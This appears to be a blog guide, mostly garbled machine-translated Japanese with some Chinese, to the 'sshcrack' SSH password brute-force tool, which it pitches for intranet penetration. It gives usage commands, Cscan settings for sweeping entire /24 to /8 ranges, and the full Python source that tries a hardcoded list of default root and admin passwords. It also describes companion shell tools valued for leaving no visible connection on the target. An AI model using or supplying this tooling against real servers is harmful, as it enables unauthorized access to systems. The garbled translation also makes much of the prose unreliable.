$ 000序文
sshcrack SSHパスワードブラストは、コマンドラインツールの下に浸透SSHパスワードを検出するのに適しています
もちろん、また、Windows / Linuxをサポートしてい、ネットワークSSHパスワードブラスト外で使用することができ、他のシステムは測定していません。TIP1
0x001ディレクトリ
1.sshcrack使い方
2.Cscanバッチスキャン
3. SSH接続を実行します
4.sshcrackソース
5.ダウンロード
0x002使い方
SSHサーバのパスワードの検出を指定します。
弱いパスワードの検出(-crackユーザパスワードだけで書くことができ、死んだので、秘密のアカウントのリストを作成する) C:ユーザーはK8team \デスクトップ\アップロード> 22ルートk8gege -crack sshcrack.exe 192.168.1.106 \ \ 192.168.1.106 22ルートtoor LoginOK シングルをパスワード認証(検定) C:ユーザーがK8team \デスクトップ\アップロード> 22がルートであるtoor -test sshcrack.exe 192.168.1.106 \ \ 192.168.1.106 22がルートtoorのLoginOKです
0x003バッチSSHサーバーのパスワード検出
0と同じディレクトリに配置Cscan.exe Cscan.iniのsshcrack.exe
Cscan.iniは、以下の
1.ブラスト弱いパスワード(パスワードまたはより密取得していない現在のアカウント)
[CSCAN] EXE = sshcrack.exe のarg = $ IP $ 22 "" "" -crack
2.知られているパスワード(同じネットワークアカウントの秘密を使用して他のマシンかどうかを迅速に検出)を確認してください
[CSCAN] EXE = sshcrack.exe のarg = $ IP $ 22ルートk8gege -test
3.Cscan C / Bセグメントの単一セグメントを走査/機械部
CSCAN 192.168.1.108(シングルIP) 192.168.1.108/24(Cパラ)CSCAN CSCAN 192.168.1.108/16(セグメントB) CSCAN 192.168.1.108/8(セグメントA)
バッチ4.Cscan IP /バッチCセクション/段落Bバッチスキャン
CSCANを入力するには、[新規ip24.txtまたはip16.txまたはip.txtファイル、および(他のパラメータ)
以下Cscan.ini K8portscanポート22により、非同定ので、ポートが、指定されていません
ポートがip.txtがポートに対応するSSHに記入する必要があることを意味指定しないでください
0x004接続SSHコマンドの実行
1.sshshellインタラクティブ接続
sshshell.exe 192.168。1.106 22ルートtoor
sshshell.exeインタラクティブ単一ファイルSSH接続手段(同様の利点がセッションパテを維持することができ、パテ同様の欠点が接続されたまま)
非対話型のコマンドラインを2.sshcmd
端部は、(すなわち、ターゲットネットワーク接続が表示されていない)、直ちに専用ネットワーク侵入をコマンド・セッションをログアウトする利点であります
3.浸透版のSSH接続ツールのGUIバージョン
利点は直ちに実行ログオフセッション(すなわち、ターゲットネットワーク接続が表示されない)、専用の侵入を終了している場合、ネットワークは、プロキシまたは外部ネットワーク接続SSHの外であってもよいです
もちろん、それはまた、アップロード用の毎日の使用のVPSの管理、ファイル管理とGUIのバージョン、サポートのために使用され、単一のファイルまたはディレクトリ全体をダウンロードすることができます
0x005 sshcrackソース
CSCANで簡単にバッチスキャン用パスワードコード化されたお勧め、または他のすべての1回の掃引、パスワードのリストについて読んするsshcrack、それはバッチの効率に影響を与える可能性があります。
以下是例子,大家可自行修改,根据自身项目添加对应密码字典,脚本还需完善,如跑出root密码后停止检测root用户或者不再爆破。
#sshcrack 1.0 #author: k8gege #https://www.cnblogs.com/k8gege #https://github.com/k8gege import paramiko import sys import logging ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) logging.raiseExceptions=False def checkSSH(host,port,user,pwd): try: ssh.connect(host,port,user,pwd) print host+' '+port+' '+user+' '+pwd+' LoginOK' checkDns() checkPing() except: pass host=sys.argv[1] port=sys.argv[2] user=sys.argv[3] pwd=sys.argv[4] type=sys.argv[5] if type=='-test': checkSSH(host,port,user,pwd) elif type=='-crack': checkSSH(host,port,'root','123456') checkSSH(host,port,'root','cisco') checkSSH(host,port,'root','Cisco') checkSSH(host,port,'admin','123456') checkSSH(host,port,'cisco','123456') checkSSH(host,port,'cisco','cisco') checkSSH(host,port,'Cisco','Cisco') checkSSH(host,port,'cisco','cisco123') checkSSH(host,port,'admin','admin') checkSSH(host,port,'root','Admin') checkSSH(host,port,'root','toor') checkSSH(host,port,'root','Admin123') checkSSH(host,port,'root','system') checkSSH(host,port,'root','system123') checkSSH(host,port,'root','System') checkSSH(host,port,'root','System123') checkSSH(host,port,'root','Admin123!@#') checkSSH(host,port,'root','root123!@#') checkSSH(host,port,'root','root2019') checkSSH(host,port,'root','root2018') checkSSH(host,port,'root','root2017') checkSSH(host,port,'root','root2016') checkSSH(host,port,'root','root2015') checkSSH(host,port,'root','root2014') checkSSH(host,port,'root','root2013') checkSSH(host,port,'root','root2012') else: checkSSH(host,port,user,pwd)
0x006 工具下载
https://github.com/k8gege/sshshell
https://github.com/k8gege/K8tools
https://github.com/k8gege/K8CScan
Tip1: Python写的程序一定跨平台?
Python虽是跨平台语言,但不见得Python写的程序一定支持所有系统
支不支持主要是看写代码的人,比如有些依赖包仅Linux下或Win下可用
你直接调用人家的包,未做任何修改,你认为一定是跨平台吗???
就算是只用原生包写的功能,也不能保证完全兼容
有些功能针对于不同系统需做不同的处理
Tip2: SSH连接工具详细说明
[原创]内网渗透专用SSH连接工具sshcmd/sshshell/ssh密码破解以及Kali开启SSH
https://www.cnblogs.com/k8gege/p/10991264.html